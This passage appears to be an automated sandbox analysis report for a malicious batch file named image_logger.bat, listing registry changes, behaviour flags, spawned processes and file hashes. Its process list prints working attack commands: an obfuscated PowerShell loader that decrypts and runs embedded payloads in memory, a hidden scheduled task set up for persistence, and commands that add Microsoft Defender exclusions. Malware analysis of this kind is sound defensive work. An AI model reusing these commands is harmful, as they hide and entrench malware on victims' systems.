| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400F8614EC51" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02nvpqbanfiebhkd" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\DeviceId = "0018400F8618AD21" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\DeviceTicket = (binary data omitted) | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nvpqbanfiebhkd\DeviceId = "<Data LastUpdatedTime=\"1717176216\"><User username=\"02NVPQBANFIEBHKD\"><HardwareInfo BoundTime=\"1717176217\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\image_logger.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2tecc/9PWMQ7v4EpLWmOKz+cEzHQwMF8S+sfdcZa71I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MF58RaRbseGO3b+sBBeK4w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mmsUZ=New-Object System.IO.MemoryStream(,$param_var); $pPoah=New-Object System.IO.MemoryStream; $LnjlI=New-Object System.IO.Compression.GZipStream($mmsUZ, [IO.Compression.CompressionMode]::Decompress); $LnjlI.CopyTo($pPoah); $LnjlI.Dispose(); $mmsUZ.Dispose(); $pPoah.Dispose(); $pPoah.ToArray();}function execute_function($param_var,$param2_var){ $QDQTS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $jFQzj=$QDQTS.EntryPoint; $jFQzj.Invoke($null, $param2_var);}$HsbVT = 'C:\Users\Admin\AppData\Local\Temp\image_logger.bat';$host.UI.RawUI.WindowTitle = $HsbVT;$bpmTM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HsbVT).Split([Environment]::NewLine);foreach ($vwomF in $bpmTM) { if ($vwomF.StartsWith('KBtWKWGXToUMrzMdMGCO')) { $gacJz=$vwomF.Substring(20); break; }}$payloads_var=[string[]]$gacJz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_811_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2tecc/9PWMQ7v4EpLWmOKz+cEzHQwMF8S+sfdcZa71I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MF58RaRbseGO3b+sBBeK4w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mmsUZ=New-Object System.IO.MemoryStream(,$param_var); $pPoah=New-Object System.IO.MemoryStream; $LnjlI=New-Object System.IO.Compression.GZipStream($mmsUZ, [IO.Compression.CompressionMode]::Decompress); $LnjlI.CopyTo($pPoah); $LnjlI.Dispose(); $mmsUZ.Dispose(); $pPoah.Dispose(); $pPoah.ToArray();}function execute_function($param_var,$param2_var){ $QDQTS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $jFQzj=$QDQTS.EntryPoint; $jFQzj.Invoke($null, $param2_var);}$HsbVT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.bat';$host.UI.RawUI.WindowTitle = $HsbVT;$bpmTM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HsbVT).Split([Environment]::NewLine);foreach ($vwomF in $bpmTM) { if ($vwomF.StartsWith('KBtWKWGXToUMrzMdMGCO')) { $gacJz=$vwomF.Substring(20); break; }}$payloads_var=[string[]]$gacJz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3808 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF3A.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5068 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
Files
C:\Windows\SoftwareDistribution\Download\929ae566f1f233c13a3bbf347b449657\BlockMap.xml
| MD5 | fafffc0eeda974c0d8413d7cb21e703e |
| SHA1 | 9a730acd930eb8e9d0fd845890650ce0db85b14b |
| SHA256 | dab722c09228d338a616f315c20032cc9ba777a6e0222264b28341cb14c5ce1e |
| SHA512 | bbe16408f0f18d7f671a925b0f59b34fd853fc23aaf6a4a4f32d7f7a14376bc2c26b3b4ce5afa8a12d5455c71075c7a90b950a5958d7b71808d064b5e0946cb0 |
C:\Windows\SoftwareDistribution\Download\4fc661cc8878223712c18124f63a67cb\BlockMap.xml
| MD5 | 2bec8080d45d8d7f9bf122a2e6b030bc |
| SHA1 | 576ef51c438f0d3fed44c9caaf4bd543e5ff243b |
| SHA256 | 1cae715adaf9881738af4de5ef5e3eb43cadd19778d1cd111b57e094c364fd64 |
| SHA512 | 102d5c32ac3a2cd256af4ea086746a6986fd427ab0f4405002a0b2ec7221344a172903c3a6096db229426c599aae6d797ec16694ac4eccae215c2cbdb7047110 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 637cc28b934114e6f2f7fd3a28414a3c |
| SHA1 | e78de6cbc2fc30fd98249d41f3cc465147915ea9 |
| SHA256 | 3aaf0fcbdb32e15abad363931c7b56fc5aa3a1c8b4a9796682dac6a8346bd795 |
| SHA512 | 4af80f922651056457ca22784b48b6253738f2b22f9b50e6e48fef22bbcfba6de6b1e8d22b28d09bf378cc49e2fa3545b9ecd0d35c1e290471baa5bfba0cae29 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 9706169038109a62bdffb734bbdb57ef |
| SHA1 | 7ac9b3e9102452ab004cfac0eac125f6bed68785 |
| SHA256 | 01e91aacf2d8a0316d5c4654fbc38d1133e55040d9ac190fc454f7f71ee32282 |
| SHA512 | e3d8cc97fbdf241a1d2cceeb5d647312ff5459eab44274fd171b0dc7b100bbd239fdd8b5007b3b15aa522d5c0f1390b39074a14483501decc7be10d968921359 |
C:\Windows\SoftwareDistribution\Download\b38597ddf936e9cb72180a70de5f06a3\BlockMap.xml
| MD5 | ab893aaab955732ebc08381c0558bb58 |
| SHA1 | 380c8979a68c1725474fe184098e89b21ebd3d4d |
| SHA256 | 82e5e0f5190f1a6c6de1a904a33db3f5cf6ed6d2dbe9c8c778ea4d5b64cc0e0b |
| SHA512 | b210ea82befba25059169f6c936335a862bfb6ba30fd80ff37776022cda8561ea951f055771861a0977de9d3ca8599110a834f2d745218251a60c7ec703f8199 |